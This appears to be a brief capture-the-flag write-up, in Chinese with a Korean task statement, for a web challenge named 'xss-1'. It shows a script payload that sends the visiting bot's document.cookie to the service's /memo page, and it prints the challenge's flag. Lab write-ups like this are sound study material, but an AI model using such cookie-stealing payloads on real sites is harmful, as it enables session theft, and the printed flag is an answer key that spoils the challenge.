xss-1#

題目

여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.
XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다.
플래그 형식은 DH{…} 입니다.

進入 /vuln 頁面可以發現 param 可以直接輸入 html 標籤並觸發 alert

vuln

/flag 頁面可以提交 param

param

/memo 會存出現過的文字

由題目給的 read_url 函式可知要將 cookies 傳到 /memo

提交 payload

1
<script>
2
  location.href="http://127.0.0.1:8000/memo?memo="+document.cookie;
3
</script>

flag

1
DH{2c01577e9542ec24d68ba0ffb846508e}